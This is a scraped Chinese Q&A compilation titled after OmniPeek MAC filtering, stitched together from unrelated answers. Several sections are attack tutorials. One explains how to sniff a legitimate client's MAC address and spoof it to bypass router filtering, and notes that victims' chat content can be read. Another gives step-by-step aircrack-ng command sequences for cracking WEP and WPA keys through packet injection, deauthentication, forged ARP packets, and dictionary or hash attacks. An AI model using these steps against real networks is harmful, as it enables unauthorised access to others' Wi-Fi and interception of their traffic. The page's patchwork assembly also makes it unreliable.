omnipeek设置mac地址过滤_omnipeek有没有mac版本

1. omnipeek有没有mac版本

必须要先来ping一下对方，然后在源2分钟内运行arp －a命令就可以察看对于的MAC地址。如果有发ARP包的话可以直接看到mac地址. 否则就只只能借助第3方软件了。比如网络执法官。 10进制换2进制使用除2取余数倒记的方法

2. windows8系统怎么破解mac地址过滤

破解无线过滤MAC
首先要找到
WildPackets
AiroPeek
NX软件所支持监测无线网卡，本文用的是卡王。并下载相应的WildPackets
AiroPeek
NX
所定制的驱动程序。将驱动更改为所定制的驱动程序。
测试目的：破解无线过滤MAC
测试系统：WINXP/SP2
无
线网卡：Cisco
AIR-CB21AG-A-K9
测试软件：Network
Stumbler、WildPackets
AiroPeek
1.
破解MAC地址前要了解SSID、频道和密码（破解SSID和密码请参考上面）下面步骤和破解SSID差不多。
打
开WildPackets
AiroPeek
NX软件，单击WildPackets
AiroPeek
NX
中的
New
Capture
按钮：
出
来了
Caputer
设置对话框－802.11，设置刚刚Network
Stumbler所嗅测出来的AP所在的频
段：11，ESSID：cooaoo,Edit
key
sets...输入所破解到密码，点确定就进行抓包了。
有
抓到包后，点Wireless
statistics小图标，就可以看到了。
cooaoo
下面的MAC：00：18：F8：41：7B：33是无线路由的MAC地址，可以在Network
Stumbler看到。
MAC：00：19：D2：4C：C9：8D就是合法的MAC地址了
也
可以点stop
capture查看合法无线客户端交换数据了，当然可以丛中分析各种东东了，比如MSN聊天内容...
获得合法无线客户
端MAC
Windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-
ng
for
Windows等工具实现对客户端MAC的拦截，Linux可用Kismet、Aircrack-ng中的airomp-ng等来实
现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据包解密方可看到客户端MAC。
更改MAC来伪造身份
在
Windows下：
方法1：如果你足够幸运，也许不需要太复杂的方法就可以修改无线网卡MAC，前提是你的无线网卡驱动携带了这项功能。可以通过
在对应的无线网卡的属性选择网卡配置---高级来查看，若出现“Locally
Administered
MAC
Address”，即可在右侧位置输
入预伪造的MAC，确定即可。
方法2：虽然通过修改注册表中的相关键值，也可以达到修改MAC的目的，但很多时候，使用这款来自台湾的专业MAC
修改工具SMAC会更有效率。
SMAC是一个强大的也是一个易于使用的和直观的Windows
MAC地址修改应用软件，它允许用户为在
Windows
2000、XP和
2003
Server系统上的几乎任何的NIC转换MAC地址，而不管这些NIC产品是否允许修改。呵呵，经我测
试，不仅支持有线网卡，还支持无线网卡，甚至蓝牙设备地址的修改。实为不可多得的利器

3. 哪位大侠指点一下外网的MAC 地址怎样查看，比方说我网卡搜到你家的路由器后在未连接的情况下查看MAC地址。

不可能的
能ping通才能看到MAC（arp -a）
但
你ping 一下网络能通，但arp -a不到它的MAC
因为，经过了路由器，它屏蔽MAC广播
因此，你只能在他的路由器下（通过他上网）才能看到它MAC

4. 我的台式机(Vista系统)用瑞银无线网卡上网为什么能连上网络却上不了网

你搜索到的网络，应该是你所处环境周围的无线路由发出的信号

没有加密并不代表你就可以用

如果，人家路由的DHCP没开，或者，MAC地址过滤，你就绝对上不了网的！

所以你要弄清具体情况

要是你能够进路由的管理界面，看看，改动设置，

应该是可以使用的！

但是，这个当然也是需要密码的！

想免费上还是比较困难，除非你认识无线路由的主人，商量一下！

5. 如何使用omnipeek抓无线报文

DHCP关闭时，需要对网络数据报文进行分析，你在用airomp-ng时不使用--ivs，保存下来的。cap文件就是我们用来分析的材料，这个。cap文件要等对方在线时抓比较好。如果你用分析软件（omnipeek，科莱，wireshark等）直接打开这个。cap文件，那么得到的是加密的数据，无法获得任何有用信息，需要先对其进行解密，很多人就是漏了这步所以才会分析失败。像omnipeek，wireshark等工具都有选项让用户填入密钥，自动进行解密，这个密钥就是你辛苦破解出来的成果。也可以用aircrack-ng套件中的工具airdecap-ng来解密数据。解密后你再使用上述的分析工具就能得到结果了。我们的目的是获取网关、IP地址及DNS，所以关注的目标集中在DNS，ARP这两种报文上，可以用过滤器过滤出来，通过分析源、目地IP及MAC地址，就能对号入座获取网关、DNS及IP了。同样的，如果获得了WPA的PSK，它的数据也可以解密，获得明文。

6. 如何获得合法的mac地址

必须要先ping一下对方，然后在2分钟内运行arp －a命令就可以察看对于的MAC地址。如果有发ARP包的话可以直接看到mac地址. 否则就只只能借助第3方软件了。比如网络执法官。
10进制换2进制使用除2取余数倒记的方法。2进制换 10进制使用2的n次方（数位为n），积相加的办法。
例110进制302，302/2 = 151 余0
151/2 = 75 余1
75/2 = 37 余1
37/2 = 18 余1
18/2 = 9 余0
9/2 = 4 余1
4/2 = 2 余0
2/2 = 1 余0
故二进制为100101110
二进制转十进制
从最后一位开始算，依次列为第0、1、2...位
第n位的数（0或1）乘以2的n次方
得到的结果相加就是答案
例2：01101011.转十进制:
第0位:1乘2的0次方=1
1乘2的1次方=2
0乘2的2次方＝0
1乘2的3次方＝8
0乘2的4次方＝0
1乘2的5次方＝32
1乘2的6次方＝64
0乘2的7次方＝0
然后：1＋2＋0
＋8＋0＋32＋64＋0＝107．
二进制01101011＝十进制107．

7. bt4 u盘破解

BT4 U盘安装首先说明，此方法只适用于BT4正式版，因为该版的引导方式与其他版本不同。
下面来说说具体步骤：

一、准备工作：（3个软件在本文章最后提供下载，ISO文件可自己另行下载）

1、bt4-pre-final.iso (系统镜像)

2、grub4dos （软件）

3、dos的引导文件（3个，command、io.sys、msdos.sys ）

4、HPUSBFW （惠普的格式化工具）

二、制作步骤：

1、用HPUSBFW软件,以格式化的方式将DOS引导文件写入U盘；

2、将grub4dos解压出来，把里面的 grldr ， Grub.exe ， menu.lst 这3个文件复制进U盘根目录；

3、把 BT4.iso 里的 boot ，casper 这2个文件夹复制到U盘根目录；

4、用 boot\grub 目录下的 menu.lst 替换掉U盘根目录下的 menu.lst 这个文件;

三、测试：

1、开机，进入BIOS，设置为U盘优先启动，然后保存并重启；

2、开始时会闪过win 98 的启动界面，然后进入到DOS；

3、输入命令“grub” ，然后按回车键，进入到grub引导模式；

4、根据提示和个人需求选择自己想要的模式；

5、系统加载完毕后，使用用户名：root，密码：toor ；进行登录；

6、进入到图形化界面的命令为 startx 。

好了，所有过程都说明白了，大家快开始自己的BT4之旅吧！

附上上面提及到的3个软件的下载链接：

grub4dos

DOS引导文件（因为是系统文件的缘故，需要把文件夹属性中的“隐藏受保护的系统文件”前面的勾去掉，这样就能显示所有的文件了。）

HP_USB_磁盘存储器格式化工具_V2.0.6.rar

WEP破解 BT4破解教程详细解答问题
WEP破解] BT4破解教程详细解答花钱买的，无偿给大家看，鄙视收费的人
记录付费主题, 价格:金币 3 元 1.下载光盘版BT4VM版和虚拟机，制作虚拟启动BT4。VM版的BT4可能都集成网卡无用，但对USB网卡支持很好。
2.启动BT4，选console控制台模式，用户名root,密码toor<注意不是root>,再运行startx启动窗口模式。
另：BT4启动黑屏问题解决办法
输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure 然后startx
我的笔记本是三星R458的，启动BT4，startx时按住空格可以进入.。
在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入
win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开
一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
---------------------end---------------------
[] 可选
<> 回显
/ 或者
() 提示
---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>
]
2.ifconfig -a wlan0 up
(可能要加载网卡才支持注入?)
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是频道)
另一说5100要支持注入用airmon-ng start wlan0
如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
<Injection is working/No anwser>(注入攻击成功/不成功)
(检测你的网卡是否支持注入)
]
4.airomp-ng -w pack -c 6 mon0/wlan0
(pack是随便起的获取的ivs的保存文件的名字)
另一说用airomp-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
一、有客户端：
破解:abcd四种方式
a.合法客户端产生大量有效的数据，能直接获得大量cap。
收到10000以上data后，直接转shell 3,破解密码
b.合法客户端只能产生少量数据，就需要注入<-3>攻击加速产生大量数据。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)
<Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>
c.合法客户端不在通信，注入模式不成功，
用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，
新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0
(可能要另开窗)
d.有客户端，并且客户端能产生有效arp 数据的另类破解方式
输入modprobe –r iwl3945
(加载网卡)
输入modprobe ipwraw
输入airmon-ng start wlan0 6
现在，只要一个命令就搞定，输入:
输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。
<key: 12:34:56:78:90>
二、无客户端：
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
(我成功了)
另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
<Authentication successful>
<Association successful>
(建立虚拟伪装连接)
如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)
破解:abcd四种方式
a.-2 crack mode ---------------
建立虚拟连接后直接用-2交互攻击模式集合了抓包，提数据和发包攻击
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
发包成功后可得到足够的ivs，然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步骤?>
c.-4 crack mode ---------------
-4攻击模式；制造数据包；-2交互式攻击模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
<?yes>
<Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件来伪造一个arp包)
8.aireplay-ng -2 -r myarp mon0
一说用aireplay-ng -2 -r myarp -x 512 mon0
(发现了可利用的myarp的数据包，按y后，立刻注入攻击。Date疯涨)
9.用aircrack-ng破解
d.-5 crack mode ---------------
-5碎片攻击模式；制造数据包；-2交互式攻击模式
(我成功过)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
<?yes>
<Saving keystream in fragment-1216-201426.xor>
(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件（xor 文件）)
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp随便起的文件名)
<Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
<?yes>
(这时，前面的抓包窗口上的data 将迅速增加)
(512是攻击速度，1024是最大值)
9.采用aircrack-ng 来进行破解
shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 参数，则这里用aircrack-ng *.ivs
(我成功了)
另一说用aircrack-ng -n 64 -b APmac pack-01.cap
<KEY FOUND! [......] <ASCII:XXXXX>>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\moles\下,启动BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<显示bash为成功,dash为失败>
3.开spoonwep2，里面可以找到网卡了,选wlan0进入搜索，但这时不会搜出来什么，
关闭一下spoonwep2再重启spoonwep2，
这时网卡项里有一个mon0的，选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack，点击launch后就等待密
码的出来(sata数据包到30000个左右)。
(注：论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是频道)
4.airomp-ng -w 12345 -c 6 mon0/wlan0
(保存名为12345.cap)
(-w：写入文件，-c：截取cap的频道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)
<18:56:20 Sending 64 directed DeAuth,... 一些类似行>
(-c后面为合法无线客户端的MAC地址)
(迫使AP重新与已连接的合法客户端重新握手验证)
(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万，
因为它只要一个包含WPA握手验证包就可以了)
Cap数据包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
另一说是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w：是字典破解模式
Password.txt是你事先准备好的字典。
技巧：可以在windows 下使用下载的字典工具生产字典，再在BackTrack3 下拷贝到/root 下（aircrack 默认
的工作目录在/root）。
请注意，破解WPA 密码的时间取决于密码难易程度，字典包含程度，内存及CPU 等。多则数小时。
)
c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解
启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...
<Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)
(Windows版本操作步骤与其Linux下版本完全一致)
(
参数解释：
-f 这里跟上采用的字典
-d 生成的Table文件名称
-s 目标AP的ESSID
)
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
(
参数解释：
-d 导入WPA PMK Hash Table文件名称，下图中为dlink-birth.hash
-r 事先捕获的WPA握手数据包
-s 目标AP的ESSID
)
---------------------end---------------------
WPA破解，怎么知道有握手包被截获？
airomp-ng监视窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包后，cap文件保存在哪？
输入ls可以看到啊,默认在root下。
如何获得合法端mac？
windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截，Linux可用
Kismet、Aircrack-ng中的airomp-ng等来实现。需要注意的是，若目标网络采用WEP或者WPA加密的话，有时需先行破解再对数据
包解密方可看到客户端MAC。
前面第一个shell，如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac
BSSID STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隐藏的SSID？
1.在BT4下先打开一个shell,输入
airomp-ng 网卡端口
2.打开另一个shell,输入
aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口
可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止
3.然后就可以在上个shell,看到显示出来的SSID。

8. 无线路由器问题（这个问题不简单）

192.168.1.100-199
255.25.255.0
192.168.1.1
你在命令行ping192.168.1.1
ipconfig /all
1.最基本，最常用的，测试物理网络的
ping 192.168.0.8 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等
A.Win98：winipcfg
B.Win2000以上：Ipconfig/all

C.NSLOOKUP：如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68

Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212

3.网络信使（经常有人问的~）
Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段
net stop messenger 停止信使服务，也可以在面板－服务修改
net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名（追捕的工作原理）
ping －a IP －t ，只显示NetBios名
nbtstat -a 192.168.10.146 比较全的

5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址
arp -a

7.在代理服务器端
捆绑IP和MAC地址，解决局域网内盗用IP！：
ARP －s 192.168.10.59 00 －50－ff－6c－08－75
解除网卡的IP与MAC地址的绑定：
arp -d 网卡IP

8.在网络邻居上隐藏你的计算机（让人家看不见你！）
net config server /hidden:yes
net config server /hidden:no 则为开启

9.几个net命令
A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。
比如：查看这个IP上的共享资源，就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名类型用途注释
--------------------------------------
网站服务 Disk
命令成功完成。

B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如：net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘

D.记录链接 net session
例如：
C:\>net session
计算机用户名客户类型打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12

\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。

10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％

11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！）
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享：
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。

12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address

Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。

语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项，请使用带有 InetAddr 参数的 arp -a，此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表，请使用 -N IfaceAddr 参数，此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项，此处的 InetAddr 代表 IP 地址。对于指定的接口，要删除表中的某项，请使用 IfaceAddr

9. 如何用omnipeek抓取802.11报文

10. 加密的无线网络能破解吗

xp下可用WirelessMon+OmniPeek+WinAircrackPack。
方法：1、查看无线网络

查看加密类型为WEP的信号最强的无线网络

2、用WirelessMon探测无线信号的相关信息

记录如下信息：无线信号的信道（波段，如6，11等），SSID，MAC地址。

3、用OmniPeek捕捉WEP数据包

（1）设置过滤器，关键是要设置协议过滤，在弹出的对话框中选择802.11 WEP Data,最后点击OK确认，关闭过滤器。

（2）新建一个捕捉任务

常规：选中“持续捕捉”选项，设置保存路径；设置缓存大小为400MB（100MB－500MB）之间;

802.11：选择信道通过，建议选择号码（选择之前记录的波段）；

过滤器：选择之间设置的过滤器名（打勾）。

最后单击确定，关闭对话框

（3）开始捕捉

单击“捕捉1”窗口右边的“开始捕捉”按钮。

在捕捉过程中我们可以看到有“接收的包”和“被过滤的包”两项数据，其中“被过滤的包”就是我们所需要的数据包。

（4）保存数据包，保存为Libpcap格式，因为只有该格式才能被WinAircrackPac软件识别。

4、用WinAircrackPac软件破解WEP密码

导航:首页 > 净水问答 > omnipeek设置mac地址过滤

omnipeek设置mac地址过滤

与omnipeek设置mac地址过滤相关的资料